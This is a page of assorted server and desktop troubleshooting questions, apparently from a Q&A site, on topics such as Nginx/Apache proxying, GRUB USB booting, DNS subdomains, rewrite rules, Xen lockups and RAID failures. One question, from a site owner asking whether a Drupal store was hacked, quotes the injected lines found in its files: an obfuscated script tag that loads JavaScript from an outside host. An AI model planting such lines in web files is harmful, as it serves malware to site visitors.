    Hello all I have a problem with my Nginx Frontend + Apache2 backend + PHPBB3 software. It doesn't load the CSS and the images neither. I get constant errors like these: 2010/04/14 16:57:25 [error] 13365#0: *69 open() "/var/www/foo/styles/styles/coffee_time/theme/large.css" failed (2: No such file or directory), client: 83.44.175.237, server: www.foo.com, request: "GET /styles/coffee_time/theme/large.css HTTP/1.1", host: "www.foo.com", referrer: "http://www.foo.com/viewforum.php?f=43" This is my config of the site: server { listen 80; server_name www.foo.com; access_log /var/log/nginx/foo.access.log; # serve static files directly location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico)$ { access_log off; expires 30d; root /var/www/trasteando/; } location / { root /var/www/foo/; index /var/www/foo/index.php; } # proxy the PHP scripts to predefined upstream .apache. # location ~ .php$ { proxy_pass http://apache; } location /styles/ { root /var/www/foo/styles/; }

  • Having trouble with a workaround, for booting from a usb stick, using grub and a minimal linux kernel to load usb drivers

    - by s hanley
I'm trying to boot from a usb stick. I formatted it to fat32, and later to ext2, and installed dsl on it using unetbootin, and later the usb install guide on dsl wiki (http://www.damnsmalllinux.org/wiki/index.php/Install_to_USB_From_within_Linux). The bios doesn't have a setting for booting from usb. Grub doesn't "see" the usb drive when I use the root and find commands, explained in (http://www.damnsmalllinux.org/wiki/index.php/USB_Booting). This happens even when I set boot from floppy at the top of the boot order. However, my usb keyboard is recognised by the bios and by grub. How can it recognise the keyboard but not the usb drive? Also, the usb led does flash even before grub starts up, so surely something must be happening usb-wise? I am now following an ubuntu guide to booting from a USB stick, using a hdd-based, minimal linux kernel to supply the usb drivers. But I'm having difficulty adapting it to other OSes (slax/dsl/aptosid). I believe I have to alter the initrd.gz file to include usb drivers and then copy that file along with vmlinuz to a partition on my hdd. But, what's the grub command for the kernel line supposed to look like? From the ubuntu example it's: title USB FLASH DRIVE root (hd0,6) kernel /boot/usb-boot/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper noprompt cdrom-detect/try-usb=true persistent initrd /boot/usb-boot/initrd.lz boot Should mine just be: title USB FLASH DRIVE root (hd0,6) kernel /boot/usb-boot/vmlinuz cdrom-detect/try-usb=true initrd /boot/usb-boot/initrd.lz boot

  • Nginx + Apache + Wordpress redirects to localhost/127.0.0.1

    - by jcrcj
Anyone know how to fix an issue with Nginx + Apache + Wordpress redirecting to localhost/127.0.0.1? I've tried a lot of different fixes, but none have worked for me. I can go to http://domain.com/wp-admin just fine and use everything there normally. But if I try to go to http://domain.com it redirects to 127.0.0.1. Everything also works fine if I just run through Apache. Here are the relevant portions of my nginx.conf: server { listen 80; server_name domain.com; root /var/www/html/wordpress; location / { try_files $uri $uri/ /index.php; } location ~ \.php$ { proxy_pass http://127.0.0.1:8080; } } Here are the relevant portions of my httpd.conf: Listen *:8080 ServerName <ip> <VirtualHost *:8080> ServerAdmin test@test DocumentRoot /var/www/html/wordpress ServerName domain.com </VirtualHost> This is what my nginx log loks like: <ip> - - [19/Jun/2012:22:35:35 +0400] "GET / HTTP/1.1" 301 0 "-" "Mozilla/5.0 This is what my httpd log looks like: 127.0.0.1 - - [19/Jun/2012:22:24:46 +0400] "GET /index.php HTTP/1.0" 301 - "-" -- WordPress Address (URL) and Site Address (URL) both have same http://domain.com

  • Storing Windows Updates for reuse

    - by Saiyine
At work we update lots of computers using Windows Update. Windows XP and 7 all day long, rarely some Vista. We do it through a corporate proxy, as connecting them to a domain to build a Wsus server is out of the question, so we download about two gigabytes a day of the very same updates everyday. I've tried WSUS Offline. It's pretty complete but when it finishes it's common to be still missing hundreds of megabytes of updates, because its intention is not to fully update a system but to install the critical updates, as the developers explain in the forums. Now I'm trying with Autoupdater. It's far worse, with poor capabilities for non-English Windows XP, but at least it gives the option to install non critical updates in Windows 7. It still misses hundres of megabytes of updates after fully updating the system. And finally, both doesn't install the driver related updates of Windows 7, so they at most save us a couple of hundreds of megabytes and a reboot (with the associated login to the computer and to the proxy) out of three or four. So, is it possible to somewhat extract the installed updates in a Windows 7 system and not having to download the same updates again and again at least with machines with the same hardware? Or even better, a generic package with all the updates?

  • Disable touch pad for mouse button region on new HP pavillion models?

    - by John
i bought a new hp pavillion dv6 series laptop. the laptop itself is fine but it has the new hp touchpad mouse which i absolutely hate. its such a stupid problem to have with a computer. the left and right mouse buttons are, themselves, part of of the touchpad, meaning that if i tap the buttons without actually pressing them down, it registers the same way as the mouse pad (the cursor moves, tap to click activates, etc.) this is a major annoyance because it prevents you from operating the mouse pad with anything more than a single finger; if for example i use my right hand index finger to move the cursor using the touch pad and rest my left hand index finger on the left mouse button for more efficient mouse-ing, the mouse will react as if im trying to use 2 fingers to move it and it will either just sit there or will spaz out. the only way this works is if i keep the finger that is resting on the mouse button absolutely still, which is very difficult and, therefore, very annoying. also, even if i do abide by the arbitrary new decree of single-finger mousepad operation, i still have a problem because when i press down on the left or right click buttons, the mouse moves slightly, what with the buttons also being part of the touch pad and all. this would not be that hard to avoid except that they decided to also make the buttons much harder to press down. now whenever i go to click something, i press hard on the mouse button, causing my finger to slightly move or roll or flatten out a bit, causing the cursor to move slightly, and causing me to click on something different. what i would like to know is if there is anyway that i can disable the touch pad on the buttons. i have gone through all of the settings under the synaptics menus but i cannot find anything about this. did i miss something in one of the menus? if not, then are there any updated drivers that allow for toggling of this function?

  • Can't get subdomain to point to working collabNet server - what am I doing wrong?

    - by Jared
Hello everyone, I am running a web server using CollabNet SubVersion EDGE. You can view it at 71.13.105DOT51 I also run another website, http://www.tutorialcraft.com. I went into my Cpanel, and created a DNS record as follows: svn.tutorialcraft.com. 14400 IN A 71.13.105.51 Yet, if you go to http://svn.tutorialcraft.com, it doesn't load. I tested to see if I was doing some wrong, so I created a ebay.tutorialcraft.com and pointed it to eBay servers, and it worked fine (it's not up now). Anyone have any ideas? Thanks UPDATE NOTES: I tried to point svn.tutorialcraft.com to my original IP address (the one that www.tutorialcraft.com is pointed to, and it still won't load. Also, may be worthy of note, I am running a wordpress multi-site server, and I have disabled blog redirection. Here is a sample of my .htaccess as well: RewriteEngine On RewriteCond %{HTTP_HOST} ^tutorialcraft\.com RewriteRule (.*) http://www.tutorialcraft.com/$1 [R=301,L] RewriteBase / RewriteRule ^index\.php$ - [L] # uploaded files RewriteRule ^files/(.+) wp-includes/ms-files.php?file=$1 [L] RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^ - [L] RewriteRule . index.php [L]

  • Cannot write to directory after taking ownership

    - by jeff charles
I had a directory on an internal hard-drive that was created in an old Windows 7 install. After re-installing my operating system, when I try to create a new directory inside that directory, I get an Access Denied message. This isn't a protected directory, just a random directory I created at the drive root (that drive was not the C drive in either install). I tried to take ownership by opening folder properties, going to the Security tab, clicking on Advanced, going to Owner tab, clicking on Edit, selecting my user account, checking Replace owner on subcontainers and objects, and clicking Apply. There were no error messages and I closed the dialogs. I rebooted, checked the owner on that folder and a couple subfolders and it appears to be set correctly. I am still getting an Access Denied message however when trying to create a directory in it. I've also tried using attrib -R . to remove any possible readonly attribute inside the directory in an admin command prompt but am still unable to create a directory using a non-admin prompt (it does work in an admin prompt). Is there anything I can do to get write access to that folder and it's subcontents in a non-elevated context without disabling UAC?

  • Ubuntu on VPS becomes unresponsive: BUG: soft lockup - CPU#0 stuck for 22s

    - by Bhante Nandiya
We have a VPS running Ubuntu, on Xen. The problem is this, about once a day, for about 20-50 minutes, at a random time, the server becomes completely unresponsive to the outside world. After this period, it becomes responsive again, as if nothing had happened, it doesn't lose uptime, it doesn't restart. It just starts responding again as if it had been in suspended animation. These outages occur under conditions of non-exceptional memory and cpu, for example 70% mem, 5% cpu. I have stopped all non-essential services so the usage is very even. These outages don't particularly occur during times of increased memory/cpu (during daily tasks), they sometimes occur at times of very low cpu use (<2%), but in the past also occured during swapping. These blackouts have been occurring both under Ubuntu 12.04 LTS, and Ubuntu 14.04 LTS - no change at all (I upgraded Ubuntu specifically to see if it helped this problem). It is possible to log into our webhosts site, and use their administration console to see error messages from during this time. Presumably, these messages are from the Xen virtualization, the main message goes like this: BUG: soft lockp - CPU#0 stuck for 22s! [ksoftireqd/0:3] (repeats many times) SysRq : Emergency Sync (Sometimes this is the only message in the console) Others seen previously under different load situations include: BUG: soft lockup - CPU#0 stuck for 22s! [swapper/0:0] (repeated many times) or: INFO: rcu_sched detected stall on CPU 0 (t=15000 jiffies) (repeated many times with t getting bigger) From googling around I've tried various kernel parameters such as nohz=off and acpi=off to no avail. All tech support has said is that other Ubuntu installations are not suffering the same problem. Anyone got any ideas or experience with this problem?

  • W7-pro indexing mydoc on disk partition does not work

    - by Yvan Thery
I am working on a HP-7100 mini tower running W7 Pro 64bits. My Local HD includes C:/ + 2 disk partitions : all my documents are located on disk partition L:/ and all my media files are on disk partition M:/ The indexing process works well on C:/ and M:/ but does not index the L:/ any more also all of them are allowed to be indexed, also the system is present on all drive security tabs. I have tested to rebuilt the indexing file with a new setting including few directories present on drive C/M/L but still with L: does not work ! One more thing I can tell you is that even after rebuilding the indexing file, I can find some residual directories or files which are out of the test selection. It is like unerased components remaining in the indexing database. As I do not know precisely how the indexing process works it is hard to know what to do ... Recently I had a bad time after using a past restoration procedure ... maybe it did corrupt the indexing file ???? If I start indexing the all L:/ disk partition the system stop at 39 found index also many more are existing .... Does any one from you guys could advise the process to create a new indexing database ... ? Any idea to get out of this mess ? Many thanks for assistance Yvan

  • Has my site been attacked?

    - by fretje
This is about an online store based on Drupal 5. All of a sudden it didn't work anymore. Upon accessing the site, this error came up: Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38 Upon further inspection I found the following two lines at the end of said index.php: <script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script> <!--7379ba6e55616ea66ac9d812fc0597ba--> After manually removing those 2 lines, the site seems to work fine again. But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end: document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>'); Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself? Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?

  • Change A Password

    - by Thomas
I have a non-domain machine that I use with our company's domain resources over vpn regularly. I switched to Windows 8 (fresh install), and the "Change a password" option went away from the Ctrl-Alt-Del window. Can't seem to google anything about this subject, or find a way to access that password change dialog. I tried running the .reg file from http://www.sevenforums.com/tutorials/63014-ctrl-alt-del-screen-add-remove-change-password.html with no luck. I also tried to Disable "Remove Change Password" via gpedit.msc. I could do it from my domain laptop, but I like to do it on this machine because it updates all my saved copies of those credentials. My local account is tied to my hotmail account if that matters. Updates: Administrator account. I apologize for stating this was an upgrade, it was a fresh install to a diff't drive. 64-bit Pro install. Bounty's almost up If someone can just confirm that the Change A Password... should or should not be present on a non-domain, Live tied, Win8 install, I'll be satisfied that I can or cannot expect to fix it.

  • nginx short urls for mediawiki

    - by William
I am trying to do short URLs for a MediaWiki site. The wiki is in a subdirectory mydir (http://www.example.com/mywiki). I've already set up rewrites in /etc/nginx/sites-available so that example.com redirects to example.com/mywiki. Currently the URL is like http://www.example.com/mywiki/index.php?title=Main_Page. I want to clean up the url so that it looks like http://www.example.com/mywiki/Main_Page. I am having quite a bit of trouble doing this. I am not familiar with regular expressions or the syntax that the nginx config files use. This is what I currently have: server_name example.com www.example.com; location / { rewrite ^.+ /mywiki/ permanent; } location /wiki/ { rewrite ^/mywiki/([^?]*)(?:\?(.*))? /mywiki/index.php?title=$1&$2 last; } The second rewrite is obviously the one that's broken. It is based off of Page title -- nginx rewrite--root access in the MediaWiki documentation. When I try to load the site, the browser tells me I get infinite redirects. Does anyone who how I should go about fixing this issue? Or rather, what is the correct way to implement this, and what do all those symbols mean?

  • /etc/hosts: What is loghost? (fresh install of Solaris 10 update 9)

    - by cjavapro
    # # Internet host table # ::1 localhost 127.0.0.1 localhost XX.XX.XX.XX myserver loghost What is the purpose of loghost? If it was not for having loghost in there, all the /etc/hosts files on all the servers in this particular network could be identical. Edit: I looked at /etc/syslog.conf #ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ # # Copyright (c) 1991-1998 by Sun Microsystems, Inc. # All rights reserved. # # syslog configuration file. # # This file is processed by m4 so be careful to quote (`') names # that match m4 reserved words. Also, within ifdef's, arguments # containing commas must be quoted. # *.err;kern.notice;auth.notice /dev/sysmsg *.err;kern.debug;daemon.notice;mail.crit /var/adm/messages *.alert;kern.err;daemon.err operator *.alert root *.emerg * # if a non-loghost machine chooses to have authentication messages # sent to the loghost machine, un-comment out the following line: #auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) # # non-loghost machines will use the following lines to cause "user" # log messages to be logged locally. # ifdef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emerg * ) Very interesting. when shutting down,, alerts go to all users probably through *.emerg * Looking at ifdef, it seems that the first parameter checks to see if current machine is a loghost, second parameter is what to do if it is and third parameter is what to do if it is not. Edit: If you want to test a logging rule you can use svcadm restart system-log to restart the logging service and then logger -p notice "test" to send a test log message where notice can be replaced with any type such as user.err, auth.notice, etc.

  • Apache, logerror and logrotate: what is the best method?

    - by OlivierDofus
Hi! Here's a vhost example of my sites: <VirtualHost *:80> DocumentRoot /datas/web/woog ServerName woog.com ServerAlias www.woog.com ErrorLog "|/httpd-2.2.8/bin/rotatelogs /logs/woog/error_log 86400" CustomLog "|/httpd-2.2.8/bin/rotatelogs /logs/woog/access_log 86400" combined DirectoryIndex index.php index.htm <Location /> Allow from All </Location> <Directory /*> Options FollowSymLinks AllowOverride Limit AuthConfig </Directory> </VirtualHost> I've got 12 sites running now. This gives something like: [Shake]:/sources/software/mod_log_rotate# ps x | grep rotate /httpd-2.2.8/bin/rotatelogs /logs/[hidden siteweb]/error_log 86400 /httpd-2.2.8/bin/rotatelogs /logs/[hidden siteweb]/error_log 86400 [snap (as many error_log as virtual hosts)] /httpd-2.2.8/bin/rotatelogs /logs/[hidden siteweb]/access_log 86400 /httpd-2.2.8/bin/rotatelogs /logs/[hidden siteweb]/access_log 86400 [snap (as many access_log as virtual hosts)] grep rotate [Shake]:/sources/software/mod_log_rotate# !!! I've been looking everywhere but I've only found mod_log_rotate. The "little" problem is that the author (very good C developper) explains: "Unfortunately Apache error logs are handled in such a way that we can't work the same log rotation magic on them. Like transfer logs they support piped logging though so you can still use rotatelogs for them. " So my question is: what would be the best way to handle multiple logs? If I just do a very classical log and I use the system's "logrotate" program couldn't this be a good deal? How would/do you deal with that? Thank you!

  • Can mod-rewrite be used to set environmental variables?

    - by VLostBoy
Hi, I've got an existing simple rewrite rule like so: <Directory /path> RewriteEngine on RewriteBase / # if the requested resource does not exist RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # route the uri to a front controller RewriteRule ^(.*)$ index.php/$1 [L] </Directory> This works fine, but I want to do one of either two things. On the basis of detecting the clients accept-language header, I want to either (i) Set the detected language as an environmental variable that the script can use or (ii)Rewrite the request so that the url begins with the language code (e.g. www.example.com/en/some/resource) In terms of implementing (i), I defined this rule: <Directory /path> RewriteEngine on RewriteBase / # if the requested resource does not exist RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # if the users preferred language is supported... RewriteCond %{HTTP:Accept-Language} ^.*(de|es|fr|it|ja|ru|en).*$ [NC] # define an environmental variable PREFER_LANG RewriteRule ^(.*)$ - [env=PREFER_LANG:%1] # route the uri to a front controller RewriteRule ^(.*)$ index.php/$1 [L] </Directory> I've tried a few variations, but PREFER_LANG is not defined in $_SERVER nor retrievable by getenv. In terms of implementing (ii)... lets just say its messy. I'll post it if I can't get an answer to one. Can anyone advise me? Thanks!

  • mod_rewrite redirect subdomain to folder

    - by kitensei
I have a wordpress blog at the url http://www.orpheecole.com, I would like to setup 3 subdomains (cycle1, cycle2, cycle3) being redirected to their folders (1 subdomain = 1 wp blog, no multisite enabled) The file tree looks like this: /var/www/orpheecole.com/ /var/www/cycle1.orpheecole.com/ /var/www/cycle2.orpheecole.com/ /var/www/cycle3.orpheecole.com/ the following .htaccess try to redirect to /var/www/orpheecole.com/cycleX instead of its own directory, but id it's possible i'd rather redirect every subdomain to its own www folder. my sites-enabled file for main site is # blog orpheecole <VirtualHost *:80> ServerAdmin [email protected] ServerName orpheecole.com ServerAlias *.orpheecole.com DocumentRoot /var/www/orpheecole.com/ <Directory /var/www/orpheecole.com/> Options -Indexes FollowSymLinks MultiViews Order allow, deny allow from all </Directory> ErrorLog /var/log/apache2/orpheecole.com-error_log TransferLog /var/log/apache2/orpheecole.com-access_log </VirtualHost> and the .htaccess located on /var/www/orpheecole.com/ looks like this <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_HOST} !^www.* [NC] RewriteCond %{HTTP_HOST} ^([^\.]+)\.orpheecole\.com$ RewriteCond /var/www/orpheecole.com/%1 -d RewriteRule ^(.*) www\.orpheecole\.com/%1/$1 [L] # BEGIN WordPress RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress </IfModule> I tried to remove wordpress directives but nothing change, and the rewrite mod is enabled and working.

  • Allowing directory view/traversal for a specific VirtualHost in Apache 2.2

    - by warren
I have the following vhost configured: <VirtualHost *:80> DocumentRoot /var/www/myvhost ServerName myv.host.com ServerAlias myv.host.com ErrorLog logs/myvhost-error_log CustomLog logs/myvhost-access_log combined ServerAdmin [email protected] <Directory /var/www/myvhost> AllowOverride All Options +Indexes </Directory> </VirtualHost> The configuration appears to be correct from the apachectl tool's perspective. However, I cannot get a directory listing on that vhost: Forbidden You don't have permission to access / on this server. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request. The error log shows the following: [Wed Mar 07 19:23:33 2012] [error] [client 66.6.145.214] Directory index forbidden by Options directive: /var/www/****** update2 More recently, the following is now kicking-into the error.log: [Wed Mar 07 20:16:10 2012] [error] [client 192.152.243.233] Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden: /var/www/error/noindex.html update3 Today, the following is getting kicked-out: [Thu Mar 08 14:05:56 2012] [error] [client 66.6.145.214] Directory index forbidden by Options directive: /var/www/<mydir> [Thu Mar 08 14:05:56 2012] [error] [client 66.6.145.214] Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden: /var/www/error/noindex.html [Thu Mar 08 14:05:57 2012] [error] [client 66.6.145.214] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace. This is after modifying the vhosts.conf file thusly: <VirtualHost *:80> DocumentRoot /var/www/<mydir> ServerName myhost ServerAlias myhost ErrorLog logs/myhost-error_log CustomLog logs/myhost-access_log combined ServerAdmin admin@myhost <Directory "/var/www/<mydir>"> Options All +Indexes +FollowSymLinks AllowOverride All Order allow, deny Allow from all </Directory> </VirtualHost> What is missing? update 4 All subdirectories of the root directory do directory listings properly - it is only the root which cannot.

  • Scripting around the lack of user:password@domain url functionality in jscript/IE

    - by Idiomatic
    I currently have a jscript that runs a php script on a server for me, dead simple. But... I want to be atleast somewhat secure so I setup a login. Now if I use the regular user:password@domain system it won't work (IE decided it was a security issue). And if I let IE just remember the password then it pops up a security message confirming my login every time (which kills the point of the button). So I need a way to make the security message go away. I could lower security settings, which tbh I am fine with but nothing seems to make it fuck off (there might be some registry setting to change). Find a fix for jscript that will let me use a password in the url. There used to be a regedit that worked for older systems which allowed IE to use url passwords (not working on my 64bit windows7 setup) though I doubt that'd have helped jscript anyways (since it outright crashes). Use an app other than IE. Inwhich case I'm not sure how to go about it, I want it to be responsive and invisible so IE was a good choice. It is near instant. Use XMLHttpRequest instead of IE directly? May even be faster but I've no idea if it'd help or just have the same error. Use a completely different approach. Maybe some app that can script website browsing. var args = {}; var objIEA = new ActiveXObject("InternetExplorer.Application"); if( WScript.Arguments.Item(0) == "pause" ){ objIEA.navigate("http://domain/index.html?pause"); } if( WScript.Arguments.Item(0) == "next" ){ objIEA.navigate("http://domain/index.html?next"); } objIEA.visible = false; while(objIEA.readyState != 4) {} objIEA.quit();

  • How do I connect remotely to SQL Server from Windows client?

    - by humble_coder
Hi All, Having a bit of an issue connecting to SQL SERVER remotely from Windows. I've verified that all of my settings are correct via SQL SERVER MANAGEMENT STUDIO EXPRESS and SQL SERVER CONFIGURATION MANAGER. I can connect remotely using ODBC drivers from other OSes (e.g. OS X, Linux, etc). However, when I connect with the same credentials from a remote Windows machine using "SQL SERVER" as the driver I am told that the system cannot connect. I've tried creating an ODBC Data Source and I get the same error: Connection failed: SQLState: '01000' SQL Server Error: 14 [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]ConnectionOpen(InvalidInstance()). Connection failed: SQLState: '08001' SQL Server Error: 14 [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]Invalid Connection From the non-windows machines I can use the IP address of the SQL Server just fine. However, on the remote Windows machine, neither IP address nor named instance works. FYI, I can create an ODBC Data Source using the named instance on the machine actually running the SQL Server (but this is, of course, nothing special -- just proof that it isn't completely hosed). One interesting note: If I use SQL STUDIO 2005 from a Windows client machine, I can use the IP address to connect remotely. Still, the whole reason I bring this up is because I need to use a software package I've written to connect to SQL Server remotely from Windows machines as well. Previously the solution was only needed to xfer data from SQL Server into a PostGRES or MySQL database on non-Windows machines (due to DBA preference). However, now they also want to move the data from the legacy software to MySQL even on Windows. Any assistance would be most appreciated. Feel free to provide a full example connection string. Best

  • RAID5 issue after replacing motherboard and upgrading firmware

    - by 8steve8
ok so ive had a 4x2TB(samsung HD204UI w/firmware patch) raid5 array working normally for about a month. It was in a h57 gigabyte motherboard using the intel raid with Windows 7 x64. Today I got an intel h67 motherboard, so I upgraded the intel raid drivers to 10.1.0.1008 from 9.6.0.1014, and I'm not sure if i checked after a reboot, but it caused no problems. I swapped in the new dh67 motherboard, and my array status was "failed". 2 of the 4 drives listed themselves as members, while the other two drives listed themselves as non-members. I tried going back to the old h57 mobo, and downgrading the raid drivers, but the issue remains. It's not port dependent, 2 of the drives always come up as non-members regardless of what port or motherboard they are plugged into. This screenshot should show that the SNs match, which raises the question why the software doesn't realize the drive is a member of the array. I'd like to know if anyone has experienced anything similar, and what should I do, can I force the drive to be recognized as a member (without wiping data)?
